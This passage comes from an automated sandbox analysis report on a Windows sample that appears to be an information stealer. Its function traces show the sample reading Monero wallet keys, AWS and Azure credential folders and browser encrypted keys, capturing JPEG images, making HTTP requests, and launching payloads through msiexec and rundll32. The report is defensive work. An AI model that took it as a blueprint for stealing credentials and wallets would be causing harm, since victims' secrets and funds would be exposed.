                  • lstrlen.KERNEL32(?), ref: 0092D32A
                  • lstrlen.KERNEL32(?), ref: 0092D339
                    • Part of subcall function 0093AA70: StrCmpCA.SHLWAPI(01058DC0,0092A7A7,?,0092A7A7,01058DC0), ref: 0093AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 0092D3B4
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: 7aaf58955b07fad885baa56c3ce3aff3680f8eb0f198c366101af020b109d6c1
                  • Instruction ID: 7d96ccc95306e4dbb50c5f9510be7337f22523a45e3826919b5b2162f6ca74ba
                  • Opcode Fuzzy Hash: 7aaf58955b07fad885baa56c3ce3aff3680f8eb0f198c366101af020b109d6c1
                  • Instruction Fuzzy Hash: 66E1F972910108ABCB04EBA0DD96FEE7379AF94301F104158F147B70A1DE79AE0ADF66
                  Function 0092C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0105DDA0,00000000,?,0094144C,00000000,?,?), ref: 0092CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0092CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0092CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0092CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0092CAD9
                  • StrStrA.SHLWAPI(?,0105DDD0,00940B52), ref: 0092CAF7
                  • StrStrA.SHLWAPI(00000000,0105DE60), ref: 0092CB1E
                  • StrStrA.SHLWAPI(?,0105DB98,00000000,?,00941458,00000000,?,00000000,00000000,?,01058ED0,00000000,?,00941454,00000000,?), ref: 0092CCA2
                  • StrStrA.SHLWAPI(00000000,0105DB58), ref: 0092CCB9
                    • Part of subcall function 0092C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0092C871
                    • Part of subcall function 0092C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0092C87C
                  • StrStrA.SHLWAPI(?,0105DB58,00000000,?,0094145C,00000000,?,00000000,01058EE0), ref: 0092CD5A
                  • StrStrA.SHLWAPI(00000000,01058FF0), ref: 0092CD71
                    • Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B46), ref: 0092C943
                    • Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B47), ref: 0092C957
                    • Part of subcall function 0092C820: lstrcat.KERNEL32(?,00940B4E), ref: 0092C978
                  • lstrlen.KERNEL32(00000000), ref: 0092CE44
                  • CloseHandle.KERNEL32(00000000), ref: 0092CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 7da5857daf67fbccb3e57bf0ca00b70c67e9ed4b25e39ad84ddfd03b5c0ce1bc
                  • Instruction ID: f0a7227fc78ea891598f9e144d484d0440ce95500cef161096c79f89000650c0
                  • Opcode Fuzzy Hash: 7da5857daf67fbccb3e57bf0ca00b70c67e9ed4b25e39ad84ddfd03b5c0ce1bc
                  • Instruction Fuzzy Hash: C4E1FC72D00108ABDB14EBA4DC96FEEB778AF94300F404159F146B7191EF746A4ACF66
                  Function 00938320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • RegOpenKeyExA.ADVAPI32(00000000,0105ACD0,00000000,00020019,00000000,009405B6), ref: 009383A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00938426
                  • wsprintfA.USER32 ref: 00938459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0093847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0093848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00938499
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 46375cf0256429d3fd0f7637d42549b3b0ee8fd5f2060d75db8f2f682bc1403b
                  • Instruction ID: c310345c30f9e9d7734b41571f9ad014d2e905d43fce03d412ea4030076ee267
                  • Opcode Fuzzy Hash: 46375cf0256429d3fd0f7637d42549b3b0ee8fd5f2060d75db8f2f682bc1403b
                  • Instruction Fuzzy Hash: CF810BB1910218ABDB24DB50CC95FEAB7B8FF88700F008699F14AA7180DF756B85CF95
                  Function 00934D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00934DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00934DCD
                    • Part of subcall function 00934910: wsprintfA.USER32 ref: 0093492C
                    • Part of subcall function 00934910: FindFirstFileA.KERNEL32(?,?), ref: 00934943
                  • lstrcat.KERNEL32(?,00000000), ref: 00934E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00934E59
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
                    • Part of subcall function 00934910: FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
                    • Part of subcall function 00934910: FindClose.KERNEL32(000000FF), ref: 00934B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00934EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00934EE5
                    • Part of subcall function 00934910: wsprintfA.USER32 ref: 009349B0
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,009408D2), ref: 009349C5
                    • Part of subcall function 00934910: wsprintfA.USER32 ref: 009349E2
                    • Part of subcall function 00934910: PathMatchSpecA.SHLWAPI(?,?), ref: 00934A1E
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,0105E730), ref: 00934A4A
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,00940FF8), ref: 00934A5C
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,?), ref: 00934A70
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,00940FFC), ref: 00934A82
                    • Part of subcall function 00934910: lstrcat.KERNEL32(?,?), ref: 00934A96
                    • Part of subcall function 00934910: CopyFileA.KERNEL32(?,?,00000001), ref: 00934AAC
                    • Part of subcall function 00934910: DeleteFileA.KERNEL32(?), ref: 00934B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: 99f88c2adf9ffb5c36bc8f223cbd16740ba3642900bb43b61cc6f922172bd4a7
                  • Instruction ID: ff31aef8b711b03045ff37fc329634e358cbdcbbcffa4fc8e67dbb407463682b
                  • Opcode Fuzzy Hash: 99f88c2adf9ffb5c36bc8f223cbd16740ba3642900bb43b61cc6f922172bd4a7
                  • Instruction Fuzzy Hash: 1341517A94030466CB54F770EC47FED7738ABA4704F004494B689670C1EEB5ABC98F92
                  Function 00939010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                  Download Yara Rule
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0093906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: c343a8e65c877090fd39372a91787e53b7b843fba733ee094763d5b31ba51521
                  • Instruction ID: c96ec0e24fa1b0cb2613734448cc1524c36fa632c54ada5238c0b94cb282f036
                  • Opcode Fuzzy Hash: c343a8e65c877090fd39372a91787e53b7b843fba733ee094763d5b31ba51521
                  • Instruction Fuzzy Hash: 7C71A9B5910208ABDF04EBE4DD89FEEB7B9AF88700F108518F515A7294DB78A905CF61
                  Function 00932E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009331C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 0093335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009334EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: dcb708c4190260a6ec4a748979d1ae4aa5b6448c206b9641b503f4044403f30b
                  • Instruction ID: e64ea95f77d809104f4d141f13c1adf7088fd9774d0fe27398c153fd97e7c13e
                  • Opcode Fuzzy Hash: dcb708c4190260a6ec4a748979d1ae4aa5b6448c206b9641b503f4044403f30b
                  • Instruction Fuzzy Hash: 15120D71810108AADB19FBA0DC92FEEB778AF94300F504169F54776191EF742B4ACFA6
                  Function 009352C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 00926280: InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
                    • Part of subcall function 00926280: StrCmpCA.SHLWAPI(?,0105E790), ref: 00926303
                    • Part of subcall function 00926280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
                    • Part of subcall function 00926280: HttpOpenRequestA.WININET(00000000,GET,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00926385
                    • Part of subcall function 00926280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
                    • Part of subcall function 00926280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935318
                  • lstrlen.KERNEL32(00000000), ref: 0093532F
                    • Part of subcall function 00938E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00938E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00935364
                  • lstrlen.KERNEL32(00000000), ref: 00935383
                  • lstrlen.KERNEL32(00000000), ref: 009353AE
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: faeec002b4c400a5992651840c55820aa66f70af09f150c856e3b58d72daf459
                  • Instruction ID: c8bb48455419a3da6039e7a1ba6c6d16ebb9e74e2cd1af84ace3d08270510dff
                  • Opcode Fuzzy Hash: faeec002b4c400a5992651840c55820aa66f70af09f150c856e3b58d72daf459
                  • Instruction Fuzzy Hash: 4D51D970910148ABCB18EF60D996BEE7779AF94300F504018F446AB592EF346B46DFA6
                  Function 009312D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 482e7d00b5f555caf8c6f157c38ae8ef183608bb717676e2c074c4b759e9d5a0
                  • Instruction ID: b23a234bf21e1a9e20eb3e6286bb9063655c234737e0bc551e947bbbb09d6d2d
                  • Opcode Fuzzy Hash: 482e7d00b5f555caf8c6f157c38ae8ef183608bb717676e2c074c4b759e9d5a0
                  • Instruction Fuzzy Hash: ECC1A6B59002199BCF14EF60DC89FEE7379BBA4304F104598F50AA7291EF74AA85CF91
                  Function 00934280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009342EC
                  • lstrcat.KERNEL32(?,0105E360), ref: 0093430B
                  • lstrcat.KERNEL32(?,?), ref: 0093431F
                  • lstrcat.KERNEL32(?,0105DDB8), ref: 00934333
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 00938D90: GetFileAttributesA.KERNEL32(00000000,?,00921B54,?,?,0094564C,?,?,00940E1F), ref: 00938D9F
                    • Part of subcall function 00929CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00929D39
                    • Part of subcall function 009299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009299EC
                    • Part of subcall function 009299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00929A11
                    • Part of subcall function 009299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00929A31
                    • Part of subcall function 009299C0: ReadFile.KERNEL32(000000FF,?,00000000,0092148F,00000000), ref: 00929A5A
                    • Part of subcall function 009299C0: LocalFree.KERNEL32(0092148F), ref: 00929A90
                    • Part of subcall function 009299C0: CloseHandle.KERNEL32(000000FF), ref: 00929A9A
                    • Part of subcall function 009393C0: GlobalAlloc.KERNEL32(00000000,009343DD,009343DD), ref: 009393D3
                  • StrStrA.SHLWAPI(?,0105EC20), ref: 009343F3
                  • GlobalFree.KERNEL32(?), ref: 00934512
                    • Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929AEF
                    • Part of subcall function 00929AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00924EEE,00000000,?), ref: 00929B01
                    • Part of subcall function 00929AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00924EEE,00000000,00000000), ref: 00929B2A
                    • Part of subcall function 00929AC0: LocalFree.KERNEL32(?,?,?,?,00924EEE,00000000,?), ref: 00929B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 009344A3
                  • StrCmpCA.SHLWAPI(?,009408D1), ref: 009344C0
